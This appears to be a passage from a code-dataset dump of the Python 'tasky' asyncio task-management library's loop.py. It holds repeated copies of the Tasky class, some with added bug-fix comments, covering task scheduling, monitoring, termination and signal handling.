        task.task = None

    # Bug fix: the return annotation said -> None, but callers depend on
    # the returned Task (init() rebinds self.stats/self.configuration).
    return task
async def execute(self, fn, *args, **kwargs) -> Any:
    '''Execute an arbitrary function outside the event loop using
    a shared Executor, returning whatever the function returns.'''
    # run_in_executor takes a bare callable, so bind the arguments now.
    fn = functools.partial(fn, *args, **kwargs)
    # Bug fix: this was annotated -> None although the executor result
    # is awaited and propagated to the caller.
    return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
    '''Run the tasky/asyncio event loop until explicitly terminated.'''
    Log.debug('running event loop until terminated')

    # Schedule startup, then hand control to the loop until stopped.
    bootstrap = self.init()
    asyncio.ensure_future(bootstrap)
    self.loop.run_forever()
    self.loop.close()
def run_until_complete(self) -> None:
    '''Run the tasky/asyncio event loop until every task has finished.'''
    Log.debug('running event loop until all tasks completed')

    # Put the monitor in draining mode: it stops the loop once no
    # tasks remain running.
    self.terminate_on_finish = True
    bootstrap = self.init()
    asyncio.ensure_future(bootstrap)
    self.loop.run_forever()
    self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
              step: float=1.0) -> None:
    '''Stop all scheduled and/or executing tasks, first by asking nicely,
    and then by waiting up to `timeout` seconds before forcefully stopping
    the asyncio event loop.

    Reschedules itself every `step` seconds until all tasks have stopped
    or the `timeout` budget is exhausted.'''
    if isinstance(self.monitor, asyncio.Future):
        Log.debug('cancelling task monitor')
        self.monitor.cancel()

    Log.debug('stopping tasks')
    # Iterate over a snapshot: stopping tasks mutates running_tasks.
    for task in list(self.running_tasks):
        # Bug fix: start_task() clears task.task in its finally block,
        # so a task that just finished may still be in the snapshot with
        # task.task == None; treat that the same as "already done"
        # instead of raising AttributeError.
        if task.task is None or task.task.done():
            Log.debug('task %s already stopped', task.name)
            self.running_tasks.discard(task)
        else:
            Log.debug('asking %s to stop', task.name)
            asyncio.ensure_future(task.stop(force=force))

    if timeout > 0 and (self.monitor or self.running_tasks):
        Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
                  timeout, len(self.running_tasks))

        # Burn `step` seconds of budget and check again shortly.
        timeout -= step
        fn = functools.partial(self.terminate, force=force,
                               timeout=timeout, step=step)
        return self.loop.call_later(step, fn)

    if timeout > 0:
        Log.debug('all tasks completed, stopping event loop')
    else:
        Log.debug('timed out waiting for tasks, stopping event loop')

    self.loop.stop()
async def start_task(self, task: Task) -> None:
    '''Run a single task to completion inside the event loop, recording
    run/completion counters and resetting the task's bookkeeping even
    when it fails or is cancelled.'''
    try:
        Log.debug('task %s starting', task.name)
        before = time.time()
        task.counters['last_run'] = before
        task.running = True
        self.running_tasks.add(task)

        await task.run_task()
        Log.debug('task %s completed', task.name)

    except CancelledError:
        # Normal shutdown path: stop()/terminate() cancel the future.
        Log.debug('task %s cancelled', task.name)

    except Exception:
        # Last-resort guard so one task's bug cannot kill the loop.
        Log.exception('unhandled exception in task %s', task.name)

    finally:
        # Reset run state so the monitor can restart the task later.
        self.running_tasks.discard(task)
        task.running = False
        task.task = None

        after = time.time()
        total = after - before
        task.counters['last_completed'] = after
        task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
    '''Monitor all known tasks for run state. Ensure that enabled tasks
    are running, and that disabled tasks are stopped.

    Polls every `interval` seconds.  When `terminate_on_finish` is set,
    it instead stops still-running tasks and exits once none remain,
    scheduling terminate() to shut the whole loop down.'''
    Log.debug('monitor running')
    while True:
        try:
            await asyncio.sleep(interval)

            for name, task in self.all_tasks.items():
                if self.terminate_on_finish:
                    # Draining mode: ask running tasks to stop.
                    if task in self.running_tasks and task.running:
                        await task.stop()
                elif task.enabled:
                    if task not in self.running_tasks:
                        Log.debug('task %s enabled, restarting', task.name)
                        await self.insert(task)
                else:
                    if task in self.running_tasks:
                        Log.debug('task %s disabled, stopping', task.name)
                        await task.stop()

            if self.terminate_on_finish and not self.running_tasks:
                Log.debug('all tasks completed, terminating')
                break

        except CancelledError:
            # terminate() cancels the monitor during shutdown.
            Log.debug('monitor cancelled')
            break

        except Exception:
            # Keep monitoring even if one pass fails unexpectedly.
            Log.exception('monitoring exception')

    # Loop exited (drain complete or cancelled): clear the handle and
    # schedule a full shutdown on the next loop iteration.
    self.monitor = None
    self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
    '''Event-loop exception handler: log unhandled exceptions from
    anywhere in the event loop, including the asyncio context dict and,
    when present, the exception object itself.'''
    Log.error('unhandled exception: %s', context['message'])
    Log.error('%s', context)

    if 'exception' in context:
        Log.error('    %s', context['exception'])
def sigint(self) -> None:
    '''Escalating Ctrl-C handling: the first press stops tasks
    gracefully, the second cancels them forcefully, and any further
    press halts the event loop outright.'''
    presses = self.stop_attempts

    if presses >= 2:
        Log.info('forcefully stopping event loop')
        self.loop.stop()
        return

    self.stop_attempts += 1
    if presses == 0:
        Log.info('gracefully stopping tasks')
        self.terminate()
    else:
        Log.info('forcefully cancelling tasks')
        self.terminate(force=True)
def sigterm(self) -> None:
    '''Handle SIGTERM from the system by stopping tasks gracefully.
    Repeated signals are ignored while waiting for tasks to finish.'''
    if self.stop_attempts >= 1:
        Log.info('received SIGTERM, bravely waiting for tasks')
        return

    Log.info('received SIGTERM, gracefully stopping tasks')
    self.stop_attempts += 1
    self.terminate()
|
jreese/tasky | tasky/loop.py | Tasky.terminate | python | def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop() | Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L175-L208 | null | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
    '''Run the tasky/asyncio event loop for `duration` seconds, then
    shut tasks down and close the loop.'''
    Log.debug('running event loop for %.1f seconds', duration)

    try:
        asyncio.ensure_future(self.init())
        self.loop.run_until_complete(asyncio.sleep(duration))
        self.terminate()
        self.loop.run_forever()
    except RuntimeError as e:
        # terminate() may stop the loop while run_forever() is active;
        # asyncio reports that as "Event loop stopped before Future
        # completed", which is expected here.
        message = e.args[0]
        if not message.startswith('Event loop stopped'):
            raise
    finally:
        self.loop.close()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.start_task | python | async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total | Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L210-L238 | null | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.monitor_tasks | python | async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate) | Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L240-L276 | [
"async def insert(self, task: Task) -> None:\n '''Insert the given task class into the Tasky event loop.'''\n\n if not isinstance(task, Task):\n task = task()\n\n if task.name not in self.all_tasks:\n task.tasky = self\n self.all_tasks[task.name] = task\n\n await task.init()\n\n... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.exception | python | def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception']) | Log unhandled exceptions from anywhere in the event loop. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L278-L284 | null | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
    '''Configuration data for the root service, as exposed by the
    attached configuration task.'''
    cfg_source = self.configuration
    return cfg_source.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
    '''Return the running Task registered under the given key.

    `name_or_class` may be the task's name (the registry key), a Task
    subclass, or a Task instance.  Returns None when nothing matches.
    '''
    # Fast path: the argument is the registry key (a name) itself.
    if name_or_class in self.all_tasks:
        return self.all_tasks[name_or_class]
    try:
        # Bug fix: for a *class* argument the old lookup used
        # `name_or_class.__class__.__name__`, i.e. the metaclass name
        # (usually 'type'), which could never match a registered task.
        # Classes are keyed by their own __name__; instances by their
        # type's name, as before.
        if isinstance(name_or_class, type):
            key = name_or_class.__name__
        else:
            key = name_or_class.__class__.__name__
        return self.all_tasks.get(key, None)
    except AttributeError:
        return None
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
    '''Run the tasky/asyncio event loop until it is explicitly stopped,
    then close it.'''
    Log.debug('running event loop until terminated')
    init_coro = self.init()
    asyncio.ensure_future(init_coro)
    loop = self.loop
    loop.run_forever()
    loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
# Cancel the monitor first so it cannot restart tasks that are being
# shut down (monitor_tasks re-inserts enabled tasks it finds stopped).
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
# Iterate over a snapshot: the loop body discards from the set.
for task in list(self.running_tasks):
if task.task.done():
